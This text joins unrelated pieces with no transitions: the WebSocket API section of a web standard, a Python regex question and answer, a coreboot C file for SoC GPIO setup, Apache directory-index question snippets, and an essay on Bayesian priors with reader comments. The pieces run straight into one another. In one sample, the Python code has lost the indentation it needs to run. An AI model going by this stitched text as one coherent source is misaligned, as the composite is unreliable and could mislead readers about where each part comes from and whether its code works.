interface WebSocket : EventTarget {
  readonly attribute USVString url;

  // ready state
  const unsigned short CONNECTING = 0;
  const unsigned short OPEN = 1;
  const unsigned short CLOSING = 2;
  const unsigned short CLOSED = 3;
  readonly attribute unsigned short readyState;
  readonly attribute unsigned long long bufferedAmount;

  // networking
  attribute EventHandler onopen;
  attribute EventHandler onerror;
  attribute EventHandler onclose;
  readonly attribute DOMString extensions;
  readonly attribute DOMString protocol;
  void close(optional [Clamp] unsigned short code, optional USVString reason);

  // messaging
  attribute EventHandler onmessage;
  attribute BinaryType binaryType;
  void send(USVString data);
  void send(Blob data);
  void send(ArrayBuffer data);
  void send(ArrayBufferView data);
};
Each WebSocket object has an associated url (a URL record).
socket = new WebSocket(url [, protocols ] )
Creates a new WebSocket object, immediately establishing the associated WebSocket connection.
url is a string giving the URL over which the connection is established. Only "ws" or "wss" schemes are allowed; others will cause a "SyntaxError" DOMException. URLs with fragments will also cause such an exception.
protocols is either a string or an array of strings. If it is a string, it is equivalent to an array consisting of just that string; if it is omitted, it is equivalent to the empty array. Each string in the array is a subprotocol name. The connection will only be established if the server reports that it has selected one of these subprotocols. The subprotocol names have to match the requirements for elements that comprise the value of Sec-WebSocket-Protocol fields as defined by the WebSocket protocol specification. [WSP]
socket . send( data )
Transmits data using the WebSocket connection. data can be a string, a Blob, an ArrayBuffer, or an ArrayBufferView.
socket . close( [ code ] [, reason ] )
Closes the WebSocket connection, optionally using code as the WebSocket connection close code and reason as the WebSocket connection close reason.
socket . url
Returns the URL that was used to establish the WebSocket connection.
socket . readyState
Returns the state of the WebSocket object's connection. It can have the values described below.
socket . bufferedAmount
Returns the number of bytes of application data (UTF-8 text and binary data) that have been queued using send() but not yet been transmitted to the network.
If the WebSocket connection is closed, this attribute's value will only increase with each call to the send() method. (The number does not reset to zero once the connection closes.)
socket . extensions
Returns the extensions selected by the server, if any.
socket . protocol
Returns the subprotocol selected by the server, if any. It can be used in conjunction with the array form of the constructor's second argument to perform subprotocol negotiation.
socket . binaryType [ = value ]
Returns a string that indicates how binary data from the WebSocket object is exposed to scripts:
"blob"
Binary data is returned in Blob form.
"arraybuffer"
Binary data is returned in ArrayBuffer form.
Can be set, to change how binary data is returned. The default is "blob".
The WebSocket(url, protocols) constructor, when invoked, must run these steps:
1. Let urlRecord be the result of applying the URL parser to url.
2. If urlRecord is failure, then throw a "SyntaxError" DOMException.
3. If urlRecord's scheme is not "ws" or "wss", then throw a "SyntaxError" DOMException.
4. If urlRecord's fragment is non-null, then throw a "SyntaxError" DOMException.
5. If protocols is a string, set protocols to a sequence consisting of just that string.
6. If any of the values in protocols occur more than once or otherwise fail to match the requirements for elements that comprise the value of Sec-WebSocket-Protocol fields as defined by the WebSocket protocol specification, then throw a "SyntaxError" DOMException. [WSP]
7. Run this step in parallel:
1. Establish a WebSocket connection given urlRecord, protocols, and the entry settings object. [FETCH]
If the establish a WebSocket connection algorithm fails, it triggers the fail the WebSocket connection algorithm, which then invokes the close the WebSocket connection algorithm, which then establishes that the WebSocket connection is closed, which fires the close event as described below.
8. Return a new WebSocket object whose url is urlRecord.
The url attribute's getter must return this WebSocket object's url, serialized.
The readyState attribute represents the state of the connection. It can have the following values:
CONNECTING (numeric value 0)
The connection has not yet been established.
OPEN (numeric value 1)
The WebSocket connection is established and communication is possible.
CLOSING (numeric value 2)
The connection is going through the closing handshake, or the close() method has been invoked.
CLOSED (numeric value 3)
The connection has been closed or could not be opened.
When the object is created its readyState must be set to CONNECTING (0).
The extensions attribute must initially return the empty string. After the WebSocket connection is established, its value might change, as defined below.
The protocol attribute must initially return the empty string. After the WebSocket connection is established, its value might change, as defined below.
The close(code, reason) method, when invoked, must run these steps:
1. If code is present, but is neither an integer equal to 1000 nor an integer in the range 3000 to 4999, inclusive, throw an "InvalidAccessError" DOMException.
2. If reason is present, then run these substeps:
1. Let reasonBytes be the result of encoding reason.
2. If reasonBytes is longer than 123 bytes, then throw a "SyntaxError" DOMException.
3. Run the first matching steps from the following list:
If the readyState attribute is in the CLOSING (2) or CLOSED (3) state
Do nothing.
The connection is already closing or is already closed. If it has not already, a close event will eventually fire as described below.
If the WebSocket connection is not yet established [WSP]
Fail the WebSocket connection and set the readyState attribute's value to CLOSING (2). [WSP]
The fail the WebSocket connection algorithm invokes the close the WebSocket connection algorithm, which then establishes that the WebSocket connection is closed, which fires the close event as described below.
If the WebSocket closing handshake has not yet been started [WSP]
Start the WebSocket closing handshake and set the readyState attribute's value to CLOSING (2). [WSP]
If neither code nor reason is present, the WebSocket Close message must not have a body.
The WebSocket Protocol specification erroneously states that the status code is required for the start the WebSocket closing handshake algorithm.
If code is present, then the status code to use in the WebSocket Close message must be the integer given by code. [WSP]
If reason is also present, then reasonBytes must be provided in the Close message after the status code. [WSP]
The start the WebSocket closing handshake algorithm eventually invokes the close the WebSocket connection algorithm, which then establishes that the WebSocket connection is closed, which fires the close event as described below.
Otherwise
Set the readyState attribute's value to CLOSING (2).
The WebSocket closing handshake is started, and will eventually invoke the close the WebSocket connection algorithm, which will establish that the WebSocket connection is closed, and thus the close event will fire, as described below.
The close() method does not discard previously sent messages before starting the WebSocket closing handshake — even if, in practice, the user agent is still busy sending those messages, the handshake will only start after the messages are sent.
The bufferedAmount attribute must return the number of bytes of application data (UTF-8 text and binary data) that have been queued using send() but that, as of the last time the event loop reached step 1, had not yet been transmitted to the network. (This thus includes any text sent during the execution of the current task, regardless of whether the user agent is able to transmit text in the background in parallel with script execution.) This does not include framing overhead incurred by the protocol, or buffering done by the operating system or network hardware.
In this simple example, the bufferedAmount attribute is used to ensure that updates are sent either at the rate of one update every 50ms, if the network can handle that rate, or at whatever rate the network can handle, if that is too fast.
var socket = new WebSocket('ws://game.example.com:12010/updates');
socket.onopen = function () {
  setInterval(function() {
    if (socket.bufferedAmount == 0)
      socket.send(getUpdateData());
  }, 50);
};
The bufferedAmount attribute can also be used to saturate the network without sending the data at a higher rate than the network can handle, though this requires more careful monitoring of the value of the attribute over time.
When a WebSocket object is created, its binaryType IDL attribute must be set to the string "blob". On getting, it must return the last value it was set to. On setting, the user agent must set the IDL attribute to the new value.
User agents can use the binaryType attribute as a hint for how to handle incoming binary data: if the attribute is set to "blob", it is safe to spool it to disk, and if it is set to "arraybuffer", it is likely more efficient to keep the data in memory. Naturally, user agents are encouraged to use more subtle heuristics to decide whether to keep incoming data in memory or not, e.g. based on how big the data is or how common it is for a script to change the attribute at the last minute. This latter aspect is important in particular because it is quite possible for the attribute to be changed after the user agent has received the data but before the user agent has fired the event for it.
The send(data) method transmits data using the connection. If the readyState attribute is CONNECTING, it must throw an "InvalidStateError" DOMException. Otherwise, the user agent must run the appropriate set of steps from the following list:
If the argument is a string
If the WebSocket connection is established and the WebSocket closing handshake has not yet started, then the user agent must send a WebSocket Message comprised of the data argument using a text frame opcode; if the data cannot be sent, e.g. because it would need to be buffered but the buffer is full, the user agent must flag the WebSocket as full and then close the WebSocket connection. Any invocation of this method with a string argument that does not throw an exception must increase the bufferedAmount attribute by the number of bytes needed to express the argument as UTF-8. [UNICODE] [ENCODING] [WSP]
If the argument is a Blob object
If the WebSocket connection is established, and the WebSocket closing handshake has not yet started, then the user agent must send a WebSocket Message comprised of data using a binary frame opcode; if the data cannot be sent, e.g. because it would need to be buffered but the buffer is full, the user agent must flag the WebSocket as full and then close the WebSocket connection. The data to be sent is the raw data represented by the Blob object. Any invocation of this method with a Blob argument that does not throw an exception must increase the bufferedAmount attribute by the size of the Blob object's raw data, in bytes. [WSP] [FILEAPI]
If the argument is an ArrayBuffer object
If the WebSocket connection is established, and the WebSocket closing handshake has not yet started, then the user agent must send a WebSocket Message comprised of data using a binary frame opcode; if the data cannot be sent, e.g. because it would need to be buffered but the buffer is full, the user agent must flag the WebSocket as full and then close the WebSocket connection. The data to be sent is the data stored in the buffer described by the ArrayBuffer object. Any invocation of this method with an ArrayBuffer argument that does not throw an exception must increase the bufferedAmount attribute by the length of the ArrayBuffer in bytes. [WSP]
If the argument is an object that matches the ArrayBufferView type definition
If the WebSocket connection is established, and the WebSocket closing handshake has not yet started, then the user agent must send a WebSocket Message comprised of data using a binary frame opcode; if the data cannot be sent, e.g. because it would need to be buffered but the buffer is full, the user agent must flag the WebSocket as full and then close the WebSocket connection. The data to be sent is the data stored in the section of the buffer described by the ArrayBuffer object that data references. Any invocation of this method with this kind of argument that does not throw an exception must increase the bufferedAmount attribute by the length of data's buffer in bytes. [WSP]
The following are the event handlers (and their corresponding event handler event types) that must be supported, as event handler IDL attributes, by all objects implementing the WebSocket interface:
Event handler    Event handler event type
onopen           open
onmessage        message
onerror          error
onclose          close
9.3.3 Feedback from the protocol
When the WebSocket connection is established, the user agent must queue a task to run these steps:
1. Change the readyState attribute's value to OPEN (1).
2. Change the extensions attribute's value to the extensions in use, if it is not the null value. [WSP]
3. Change the protocol attribute's value to the subprotocol in use, if it is not the null value. [WSP]
4. Fire an event named open at the WebSocket object.
Since the algorithm above is queued as a task, there is no race condition between the WebSocket connection being established and the script setting up an event listener for the open event.
When a WebSocket message has been received with type type and data data, the user agent must queue a task to follow these steps: [WSP]
1. If the readyState attribute's value is not OPEN (1), then return.
2. Let dataForEvent be determined by switching on type and binaryType:
type indicates that the data is Text
a new DOMString containing data
type indicates that the data is Binary and binaryType is "blob"
a new Blob object, created in the relevant Realm of the WebSocket object, that represents data as its raw data [FILEAPI]
type indicates that the data is Binary and binaryType is "arraybuffer"
a new ArrayBuffer object, created in the relevant Realm of the WebSocket object, whose contents are data
3. Fire an event named message at the WebSocket object, using MessageEvent, with the origin attribute initialized to the serialization of the WebSocket object's url's origin, and the data attribute initialized to dataForEvent.
User agents are encouraged to check if they can perform the above steps efficiently before they run the task, picking tasks from other task queues while they prepare the buffers if not. For example, if the binaryType attribute was set to "blob" when the data arrived, and the user agent spooled all the data to disk, but just before running the above task for this particular message the script switched binaryType to "arraybuffer", the user agent would want to page the data back to RAM before running this task so as to avoid stalling the main thread while it created the ArrayBuffer object.
Here is an example of how to define a handler for the message event in the case of text frames:
mysocket.onmessage = function (event) {
  if (event.data == 'on') {
    turnLampOn();
  } else if (event.data == 'off') {
    turnLampOff();
  }
};
The protocol here is a trivial one, with the server just sending "on" or "off" messages.
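For illustration, a matching server for this trivial protocol might look like the following sketch in Python, using the third-party websockets package; the package choice, host, port, and the one-second toggle are assumptions for the example, not part of this specification:

import asyncio
import websockets  # third-party package (pip install websockets), assumed available

async def lamp_handler(ws):
    # Alternate the lamp once per second by sending "on"/"off" text frames.
    state = False
    while True:
        state = not state
        await ws.send("on" if state else "off")
        await asyncio.sleep(1)

async def main():
    # Note: in older versions of the package the handler also receives a path argument.
    async with websockets.serve(lamp_handler, "localhost", 12010):
        await asyncio.Future()  # run until cancelled

asyncio.run(main())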
When the WebSocket closing handshake is started, the user agent must queue a task to change the readyState attribute's value to CLOSING (2). (If the close() method was called, the readyState attribute's value will already be set to CLOSING (2) when this task runs.) [WSP]
When the WebSocket connection is closed, possibly cleanly, the user agent must queue a task to run the following substeps:
1. Change the readyState attribute's value to CLOSED (3).
2. If the user agent was required to fail the WebSocket connection, or if the WebSocket connection was closed after being flagged as full, fire an event named error at the WebSocket object. [WSP]
3. Fire an event named close at the WebSocket object, using CloseEvent, with the wasClean attribute initialized to true if the connection closed cleanly and false otherwise, the code attribute initialized to the WebSocket connection close code, and the reason attribute initialized to the result of applying UTF-8 decode without BOM to the WebSocket connection close reason. [WSP]
User agents must not convey any failure information to scripts in a way that would allow a script to distinguish the following situations:
A server whose host name could not be resolved.
A server to which packets could not be routed.
A server that refused the connection on the specified port.
A server that failed to correctly perform a TLS handshake (e.g., the server certificate can't be verified).
A server that did not complete the opening handshake (e.g. because it was not a WebSocket server).
A WebSocket server that sent a correct opening handshake, but that specified options that caused the client to drop the connection (e.g. the server specified a subprotocol that the client did not offer).
A WebSocket server that abruptly closed the connection after successfully completing the opening handshake.
In all of these cases, the WebSocket connection close code would be 1006, as required by the WebSocket Protocol specification. [WSP]
Allowing a script to distinguish these cases would allow a script to probe the user's local network in preparation for an attack.
In particular, this means the code 1015 is not used by the user agent (unless the server erroneously uses it in its close frame, of course).
The task source for all tasks queued in this section is the WebSocket task source.
9.3.4 Ping and Pong frames
The WebSocket protocol specification defines Ping and Pong frames that can be used for keep-alive, heart-beats, network status probing, latency instrumentation, and so forth. These are not currently exposed in the API.
User agents may send ping and unsolicited pong frames as desired, for example in an attempt to maintain local network NAT mappings, to detect failed connections, or to display latency metrics to the user. User agents must not use pings or unsolicited pongs to aid the server; it is assumed that servers will solicit pongs whenever appropriate for the server's needs.
9.3.5 The CloseEvent interface
WebSocket objects use the CloseEvent interface for their close events:
[Constructor(DOMString type, optional CloseEventInit eventInitDict), Exposed=(Window,Worker)]
interface CloseEvent : Event {
  readonly attribute boolean wasClean;
  readonly attribute unsigned short code;
  readonly attribute USVString reason;
};

dictionary CloseEventInit : EventInit {
  boolean wasClean = false;
  unsigned short code = 0;
  USVString reason = "";
};
event . wasClean
Returns true if the connection closed cleanly; false otherwise.
event . code
Returns the WebSocket connection close code provided by the server.
event . reason
Returns the WebSocket connection close reason provided by the server.
The wasClean attribute must return the value it was initialized to. It represents whether the connection closed cleanly or not.
The code attribute must return the value it was initialized to. It represents the WebSocket connection close code provided by the server.
The reason attribute must return the value it was initialized to. It represents the WebSocket connection close reason provided by the server.
9.3.6 Garbage collection
A WebSocket object whose readyState attribute's value was set to CONNECTING (0) as of the last time the event loop reached step 1 must not be garbage collected if there are any event listeners registered for open events, message events, error events, or close events.
A WebSocket object whose readyState attribute's value was set to OPEN (1) as of the last time the event loop reached step 1 must not be garbage collected if there are any event listeners registered for message events, error, or close events.
A WebSocket object whose readyState attribute's value was set to CLOSING (2) as of the last time the event loop reached step 1 must not be garbage collected if there are any event listeners registered for error or close events.
A WebSocket object with an established connection that has data queued to be transmitted to the network must not be garbage collected. [WSP]
If a WebSocket object is garbage collected while its connection is still open, the user agent must start the WebSocket closing handshake, with no status code for the Close message. [WSP]
If a user agent is to make disappear a WebSocket object (this happens when a Document object goes away), the user agent must follow the first appropriate set of steps from the following list:
If the WebSocket connection is not yet established [WSP]
Fail the WebSocket connection. [WSP]
If the WebSocket closing handshake has not yet been started [WSP]
Start the WebSocket closing handshake, with the status code to use in the WebSocket Close message being 1001. [WSP]
Otherwise
Do nothing.
Python Question
Searching regex expression, to return string with spaces
I am trying to search a string in Python using a regex for a particular word that begins with a space and ends with a space. The string in question that I want to search is "JAKARTA, INDONESIA (1 February 2017)", and I want to get back the ", INDONESIA (" part so I can apply rtrim and ltrim to it, as I could also be returning United Kingdom.
I have attempted this within my Python code:
import re
text = "JAKARTA, INDONESIA (1 February 2017)"
countryRegex = re.compile(r'^(,)(\s)([a-zA-Z]+)(\s)(\()$')
mo = countryRegex.search(text)
print(mo.group())
However, this prints out
AttributeError: 'NoneType' object has no attribute 'group'
indicating to me that I am not returning any matched objects. I then attempted to use my regex on regex101; however, it still returns an error saying "Your regular expression does not match the subject string."
I assumed this would work, as I test for a literal comma (,), then a space (\s), then one or more letters ([a-zA-Z]+), then another space (\s), and then finally an opening bracket, making sure I have escaped it (\(). Is there something wrong with my regex?
Answer
Once you remove the anchors (^ matches the start of string position and $ matches the end of string position), the regex will match the string. However, you may get INDONESIA with a capturing group using:
,\s*([a-zA-Z]+)\s*\(
See the regex demo. match.group(1) will contain the value.
Details:
• ,\s* - a comma and zero or more whitespaces (replace * with + if you want at least 1 whitespace to be present)
• ([a-zA-Z]+) - capturing group 1 matching one or more ASCII letters
• \s* - zero or more whitespaces
• \( - a ( literal symbol.
Sample Python code:
import re
text = "JAKARTA, INDONESIA (1 February 2017)"
countryRegex = re.compile(r',\s*([a-zA-Z]+)\s*\(')
mo = countryRegex.search(text)
if mo:
print(mo.group(1))
An alternative regex that would capture anything between ,+whitespace and whitespace+( is
,\s*([^)]+?)\s*\(
See this regex demo. Here, [^)]+? matches 1+ chars other than ) as few as possible.
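As a quick illustrative check of the alternative pattern (this snippet is a sketch, not part of the original answer; the second input string is a hypothetical example):

import re

alt = re.compile(r',\s*([^)]+?)\s*\(')

mo = alt.search("JAKARTA, INDONESIA (1 February 2017)")
if mo:
    print(mo.group(1))  # INDONESIA

# Unlike [a-zA-Z]+, this pattern also handles multi-word country names:
mo2 = alt.search("LONDON, UNITED KINGDOM (1 February 2017)")
if mo2:
    print(mo2.group(1))  # UNITED KINGDOM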
/*
 * This file is part of the coreboot project.
 *
 * Copyright (C) 2011 The Chromium OS Authors. All rights reserved.
 * Copyright (C) 2013 Sage Electronic Engineering, LLC.
 *
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; version 2 of the License.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
 * GNU General Public License for more details.
 */

#include <stdint.h>
#include <string.h>
#include <arch/io.h>
#include "soc.h"
#include "gpio.h"

#define MAX_GPIO_NUMBER 31 /* zero based */

void setup_soc_gpios(const struct soc_gpio_map *gpio)
{
        u16 gpiobase = pci_read_config16(SOC_LPC_DEV, GBASE) & ~0xf;
        u32 *cfiobase = (u32 *)(pci_read_config32(SOC_LPC_DEV, IOBASE) & ~0xf);
        u32 cfio_cnt = 0;

        /* GPIO */
        if (gpio->core.level)
                outl(*((u32*)gpio->core.level), gpiobase + GPIO_SC_GP_LVL);
        if (gpio->core.mode)
                outl(*((u32*)gpio->core.mode), gpiobase + GPIO_SC_USE_SEL);
        if (gpio->core.direction)
                outl(*((u32*)gpio->core.direction), gpiobase + GPIO_SC_IO_SEL);
        if (gpio->core.tpe)
                outl(*((u32*)gpio->core.tpe), gpiobase + GPIO_SC_TPE);
        if (gpio->core.tne)
                outl(*((u32*)gpio->core.tne), gpiobase + GPIO_SC_TNE);
        if (gpio->core.ts)
                outl(*((u32*)gpio->core.ts), gpiobase + GPIO_SC_TS);

        /* GPIO SUS Well Set 1 */
        if (gpio->sus.level)
                outl(*((u32*)gpio->sus.level), gpiobase + GPIO_SUS_GP_LVL);
        if (gpio->sus.mode)
                outl(*((u32*)gpio->sus.mode), gpiobase + GPIO_SUS_USE_SEL);
        if (gpio->sus.direction)
                outl(*((u32*)gpio->sus.direction), gpiobase + GPIO_SUS_IO_SEL);
        if (gpio->sus.tpe)
                outl(*((u32*)gpio->sus.tpe), gpiobase + GPIO_SUS_TPE);
        if (gpio->sus.tne)
                outl(*((u32*)gpio->sus.tne), gpiobase + GPIO_SUS_TNE);
        if (gpio->sus.ts)
                outl(*((u32*)gpio->sus.ts), gpiobase + GPIO_SUS_TS);
        if (gpio->sus.we)
                outl(*((u32*)gpio->sus.we), gpiobase + GPIO_SUS_WE);

        /* GPIO PAD Settings */
        /* CFIO Core Well Set 1 */
        if ((gpio->core.cfio_init != NULL) && (gpio->core.cfio_entrynum != 0)) {
                write32(cfiobase + (0x0700 / sizeof(u32)), (u32)0x01001002);
                for (cfio_cnt = 0; cfio_cnt < gpio->core.cfio_entrynum; cfio_cnt++) {
                        if (!((u32)gpio->core.cfio_init[cfio_cnt].pad_conf_0))
                                continue;
                        write32(cfiobase + ((CFIO_PAD_CONF0 + (16*cfio_cnt))/sizeof(u32)), (u32)gpio->core.cfio_init[cfio_cnt].pad_conf_0);
                        write32(cfiobase + ((CFIO_PAD_CONF1 + (16*cfio_cnt))/sizeof(u32)), (u32)gpio->core.cfio_init[cfio_cnt].pad_conf_1);
                        write32(cfiobase + ((CFIO_PAD_VAL + (16*cfio_cnt))/sizeof(u32)), (u32)gpio->core.cfio_init[cfio_cnt].pad_val);
                        write32(cfiobase + ((CFIO_PAD_DFT + (16*cfio_cnt))/sizeof(u32)), (u32)gpio->core.cfio_init[cfio_cnt].pad_dft);
                }
                write32(cfiobase + (0x0700 / sizeof(u32)), (u32)0x01041002);
        }

        /* CFIO SUS Well Set 1 */
        if ((gpio->sus.cfio_init != NULL) && (gpio->sus.cfio_entrynum != 0)) {
                write32(cfiobase + (0x1700 / sizeof(u32)), (u32)0x01001002);
                for (cfio_cnt = 0; cfio_cnt < gpio->sus.cfio_entrynum; cfio_cnt++) {
                        if (!((u32)gpio->sus.cfio_init[cfio_cnt].pad_conf_0))
                                continue;
                        write32(cfiobase + ((CFIO_PAD_CONF0 + 0x1000 + (16*cfio_cnt))/sizeof(u32)), (u32)gpio->sus.cfio_init[cfio_cnt].pad_conf_0);
                        write32(cfiobase + ((CFIO_PAD_CONF1 + 0x1000 + (16*cfio_cnt))/sizeof(u32)), (u32)gpio->sus.cfio_init[cfio_cnt].pad_conf_1);
                        write32(cfiobase + ((CFIO_PAD_VAL + 0x1000 + (16*cfio_cnt))/sizeof(u32)), (u32)gpio->sus.cfio_init[cfio_cnt].pad_val);
                        write32(cfiobase + ((CFIO_PAD_DFT + 0x1000 + (16*cfio_cnt))/sizeof(u32)), (u32)gpio->sus.cfio_init[cfio_cnt].pad_dft);
                }
                write32(cfiobase + (0x1700 / sizeof(u32)), (u32)0x01041002);
        }
}

int get_gpio(int gpio_num)
{
        u16 gpio_base = pci_read_config16(SOC_LPC_DEV, GBASE) & ~0xf;
        int bit;

        if (gpio_num > MAX_GPIO_NUMBER)
                return 0; /* Ignore wrong GPIO numbers. */

        bit = gpio_num % 32;

        return (inl(gpio_base + GPIO_SC_USE_SEL) >> bit) & 1;
}
Why is “Options Includes Indexes” Enabled by Default in Apache?
I was curious as to why Options Includes Indexes is generally enabled by default in Apache configurations. Anyone know why this is, as it's generally frowned upon for security reasons?
Remove server and system name from apache auto indexes
I've configured apache2 to display folder content with option Indexes in one of my locations, but I really dislike how apache brags about its version and system's version. How do I remove this ...
Followup to: "Inductive Bias"
What exactly is a "prior", as a mathematical object? Suppose you're looking at an urn filled with red and white balls. When you draw the very first ball, you haven't yet had a chance to gather much evidence, so you start out with a rather vague and fuzzy expectation of what might happen - you might say "fifty/fifty, even odds" for the chance of getting a red or white ball. But you're ready to revise that estimate for future balls as soon as you've drawn a few samples. So then this initial probability estimate, 0.5, is not repeat not a "prior".
An introduction to Bayes's Rule for confused students might refer to the population frequency of breast cancer as the "prior probability of breast cancer", and the revised probability after a mammography as the "posterior probability". But in the scriptures of Deep Bayesianism, such as Probability Theory: The Logic of Science, one finds a quite different concept - that of prior information, which includes e.g. our beliefs about the sensitivity and specificity of mammography exams. Our belief about the population frequency of breast cancer is only one small element of our prior information.
In my earlier post on inductive bias, I discussed three possible beliefs we might have about an urn of red and white balls, which will be sampled without replacement:
• Case 1: The urn contains 5 red balls and 5 white balls;
• Case 2: A random number was generated between 0 and 1, and each ball was selected to be red (or white) at this probability;
• Case 3: A monkey threw balls into the urn, each with a 50% chance of being red or white.
In each case, if you ask me - before I draw any balls - to estimate my marginal probability that the fourth ball drawn will be red, I will respond "50%". And yet, once I begin observing balls drawn from the urn, I reason from the evidence in three different ways:
• Case 1: Each red ball drawn makes it less likely that future balls will be red, because I believe there are fewer red balls left in the urn.
• Case 2: Each red ball drawn makes it more plausible that future balls will be red, because I will reason that the random number was probably higher, and that the urn is hence more likely to contain mostly red balls.
• Case 3: Observing a red or white ball has no effect on my future estimates, because each ball was independently selected to be red or white at a fixed, known probability.
Suppose I write a Python program to reproduce my reasoning in each of these scenarios. The program will take in a record of balls observed so far, and output an estimate of the probability that the next ball drawn will be red. It turns out that the only necessary information is the count of red balls seen and white balls seen, which we will respectively call R and W. So each program accepts inputs R and W, and outputs the probability that the next ball drawn is red:
• Case 1: return (5 - R)/(10 - R - W) # Number of red balls remaining / total balls remaining
• Case 2: return (R + 1)/(R + W + 2) # Laplace's Law of Succession
• Case 3: return 0.5
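A minimal runnable version of these three programs (a sketch assuming Python 3, so that / is true division):

def case1(R, W):
    """Urn known to contain 5 red and 5 white balls, drawn without replacement."""
    return (5 - R) / (10 - R - W)   # red balls remaining / total balls remaining

def case2(R, W):
    """Unknown red fraction, uniform on [0, 1]: Laplace's Law of Succession."""
    return (R + 1) / (R + W + 2)

def case3(R, W):
    """Each ball was independently red with known probability 1/2."""
    return 0.5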
These programs are correct so far as they go. But unfortunately, probability theory does not operate on Python programs. Probability theory is an algebra of uncertainty, a calculus of credibility, and Python programs are not allowed in the formulas. It is like trying to add 3 to a toaster oven.
To use these programs in the probability calculus, we must figure out how to convert a Python program into a more convenient mathematical object - say, a probability distribution.
Suppose I want to know the combined probability that the sequence observed will be RWWRR, according to program 2 above. Program 2 does not have a direct faculty for returning the joint or combined probability of a sequence, but it is easy to extract anyway. First, I ask what probability program 2 assigns to observing R, given that no balls have been observed. Program 2 replies "1/2". Then I ask the probability that the next ball is R, given that one red ball has been observed; program 2 replies "2/3". The second ball is actually white, so the joint probability so far is 1/2 * 1/3 = 1/6. Next I ask for the probability that the third ball is red, given that the previous observation is RW; this is summarized as "one red and one white ball", and the answer is 1/2. The third ball is white, so the joint probability for RWW is 1/12. For the fourth ball, given the previous observation RWW, the probability of redness is 2/5, and the joint probability goes to 1/30. We can write this as p(RWWR|RWW) = 2/5, which means that if the sequence so far is RWW, the probability assigned by program 2 to the sequence continuing with R and forming RWWR equals 2/5. And then p(RWWRR|RWWR) = 1/2, and the combined probability is 1/60.
We can do this with every possible sequence of ten balls, and end up with a table of 1024 entries. This table of 1024 entries constitutes a probability distribution over sequences of observations of length 10, and it says everything the Python program had to say (about 10 or fewer observations, anyway). Suppose I have only this probability table, and I want to know the probability that the third ball is red, given that the first two balls drawn were white. I need only sum over the probability of all entries beginning with WWR, and divide by the probability of all entries beginning with WW.
We have thus transformed a program that computes the probability of future events given past experiences, into a probability distribution over sequences of observations.
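The extraction just described is mechanical, so it is easy to sketch in code (reusing case2 from the snippet above; the 1/60 result and the 1024-entry table match the walkthrough):

from itertools import product

def seq_probability(predict, seq):
    # Joint probability the predictor assigns to a sequence such as 'RWWRR'.
    p, R, W = 1.0, 0, 0
    for ball in seq:
        p_red = predict(R, W)
        p *= p_red if ball == 'R' else 1.0 - p_red
        R, W = R + (ball == 'R'), W + (ball == 'W')
    return p

assert abs(seq_probability(case2, 'RWWRR') - 1 / 60) < 1e-12

# The distribution over all length-10 sequences: 1024 entries summing to 1.
table = {''.join(s): seq_probability(case2, s) for s in product('RW', repeat=10)}
assert abs(sum(table.values()) - 1.0) < 1e-9

# P(third ball red | first two white), computed from the table alone:
p_wwr = sum(p for s, p in table.items() if s.startswith('WWR'))
p_ww = sum(p for s, p in table.items() if s.startswith('WW'))
print(p_wwr / p_ww)   # 0.25, i.e. Laplace's (0 + 1) / (2 + 2)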
You wouldn't want to do this in real life, because the Python program is ever so much more compact than a table with 1024 entries. The point is not that we can turn an efficient and compact computer program into a bigger and less efficient giant lookup table; the point is that we can view an inductive learner as a mathematical object, a distribution over sequences, which readily fits into standard probability calculus. We can take a computer program that reasons from experience and think about it using probability theory.
Why might this be convenient? Say that I'm not sure which of these three scenarios best describes the urn - I think it's about equally likely that each of the three cases holds true. How should I reason from my actual observations of the urn? If you think about the problem from the perspective of constructing a computer program that imitates my inferences, it looks complicated - we have to juggle the relative probabilities of each hypothesis, and also the probabilities within each hypothesis. If you think about it from the perspective of probability theory, the obvious thing to do is to add up all three distributions with weightings of 1/3 apiece, yielding a new distribution (which is in fact correct). Then the task is just to turn this new distribution into a computer program, which turns out not to be difficult.
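Continuing the sketch (this assumes the case functions and seq_probability defined above): because all three hypotheses are exchangeable, only the counts of past draws matter, so a representative ordering suffices to reweight them.

def mixture_predict(R, W, priors=(1/3, 1/3, 1/3)):
    # P(next ball red) under the equal-weight mixture, valid for R + W < 10.
    # Each hypothesis is reweighted by the probability it assigned to the
    # data seen so far (Bayes' rule); the predictions are then averaged.
    programs = (case1, case2, case3)
    seq = 'R' * R + 'W' * W              # any ordering with these counts
    weights = [p * seq_probability(f, seq) for p, f in zip(priors, programs)]
    total = sum(weights)
    return sum(w * f(R, W) for w, f in zip(weights, programs)) / total

print(mixture_predict(0, 0))   # 0.5 before any evidence
print(mixture_predict(3, 0))   # ~0.62: three reds shift weight toward case 2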
So that is what a prior really is - a mathematical object that represents all of your starting information plus the way you learn from experience.
Comments (19)
I'm confused when you say that the prior represents all your starting information plus the way you learn from experience. Isn't the way you learn from experience fixed, in this framework? Given that you are using Bayesian methods, so that the idea of a prior is well defined, then doesn't that already tell how you will learn from experience?
Hal, with a poor prior, "Bayesian updating" can lead to learning in the wrong direction or to no learning at all. Bayesian updating guarantees a certain kind of consistency, but not correctness. (If you have five city maps that agree with each other, they might still disagree with the city.) You might think of Bayesian updating as a kind of lower level of organization - like a computer chip that runs programs, or the laws of physics that run the computer chip - underneath the activity of learning. If you start with a maxentropy prior that assigns equal probability to every sequence of observations, and carry out strict Bayesian updating, you'll still never learn anything; your marginal probabilities will never change as a result of the Bayesian updates. Conversely, if you somehow had a good prior but no Bayesian engine to update it, you would stay frozen in time and no learning would take place. To learn you need a good prior and an updating engine. Taking a picture requires a camera, light - and also time.
This probably deserves its own post.
Another thing I don't fully understand is the process of "updating" a prior. I've seen different flavors of Bayesian reasoning described. In some, we start with a prior, get some information and update the probabilities. This new probability distribution now serves as our prior for interpreting the next incoming piece of information, which then causes us to further update the prior. In other interpretations, the priors never change; they are always considered the initial probability distribution. We then use those prior probabilities plus our sequence of observations since then to make new interpretations and predictions. I gather that these can be considered mathematically identical, but do you think one or the other is a more useful or helpful way to think of it?
In this example, you start off with uncertainty about which process put in the balls, so we give 1/3 probability to each. But then as we observe balls coming out, we can update this prior. Once we see 6 red balls for example, we can completely eliminate Case 1 which put in 5 red and 5 white. We can think of our prior as our information about the ball-filling process plus the current state of the urn, and this can be updated after each ball is drawn.
Hal,
